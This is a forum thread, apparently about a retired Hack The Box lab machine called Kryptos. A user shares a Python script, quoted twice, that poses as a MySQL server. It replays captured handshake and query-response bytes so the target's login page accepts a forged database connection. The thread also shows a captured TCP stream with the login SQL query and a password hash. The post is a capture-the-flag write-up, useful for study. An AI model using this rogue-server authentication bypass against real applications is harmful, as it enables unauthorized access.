Use the script as a particular MySQL server to bypass Kryptos login

Kryptos retired and I didn’t get user,stuck at the encrypt part.
Thanks for @limbernie & @n1b1ru 's help.I request,both of you response.But I couldn’t solve it eventually.Well,I’m C136Rick,not @0xRick (you know what I mean) :p.
And Thanks @no0ne & @Adamm for making it,I like it.

Here is what I did.Just copied the MySQL response to the program by analyzing captured network data of MySQL using Wireshark.When that request’s parameter(db) was set and done in burp,ran the program and I got 302,which means it worked.

import socket
import logging
logging.basicConfig(level=logging.DEBUG)

if __name__ == '__main__':

    sock = socket.socket()
    sock.bind(("0.0.0.0", 3306))
    sock.listen(5)

    con, addr = sock.accept()
    
	logging.info('Connnect from: %r', addr)
	# Wireshark Info: Server Greeting proto=10 version=5.5.53
	con.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
	# Wireshark Info: Response OK
	con.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    con.recv(2048)
	
    logging.info("Wireshark Info: Request Query")
	# Wireshark Info: Response.
	con.sendall("\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
    con.recv(2048)
	
	logging.info("Wireshark Info: Request Quit")
	logging.info("done!")
    con.close()

Type your comment> @C136Rick said:

Kryptos retired and I didn’t get user,stuck at the encrypt part.
Thanks for @limbernie & @n1b1ru.I request,both of you response.But I couldn’t solve it eventually.Well,I’m C136Rick,not @0xRick (you know what I mean) :p.
And Thanks @no0ne & @Adamm for making it,I like it.

Here is what I did.Just copied the MySQL response to the program by analyzing captured network data of MySQL using Wireshark.When that request’s parameter(db) was set and done in burp,ran the program and I got 302,which means it worked.

import socket
import logging
logging.basicConfig(level=logging.DEBUG)

if __name__ == '__main__':

    sock = socket.socket()
    sock.bind(("0.0.0.0", 3306))
    sock.listen(5)

    con, addr = sock.accept()
    
	logging.info('Connnect from: %r', addr)
	# Wireshark Info: Server Greeting proto=10 version=5.5.53
	con.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
	# Wireshark Info: Response OK
	con.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    con.recv(2048)
	
    logging.info("Wireshark Info: Request Query")
	# Wireshark Info: Response.
	con.sendall("\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
    con.recv(2048)
	
	logging.info("Wireshark Info: Request Quit")
	logging.info("done!")
    con.close()

ohhh

You can still continue to work on it even though Kryptos has retired.

Type your comment> @limbernie said:

You can still continue to work on it even though Kryptos has retired.

Knew it and thanks for response.

nice work, i havent done Kryptos, watched ippsec video. Could you comment your code about the hex values ?

Type your comment> @peek said:

nice work, i havent done Kryptos, watched ippsec video. Could you comment your code about the hex values ?

It 's all about data of MySQL.
Here is TCP stream of Wireshark,just ignore "username " and “password”.

J...
5.5.53.....nz;Tvsaj...!...............pv!=P\Z2*zI?.mysql_native_password.Z...........!.......................dbuser..-!.n.>.s!#..M..?....cryptor.mysql_native_password............m....SELECT username, password FROM users WHERE username='11111' AND password='1bbd886460827015e5d605ed44252251' .....7....def.cryptor.users.users.username.username.!...........7....def.cryptor.users.users.password.password.!.................."......dbuser.dbuser......."......

thanks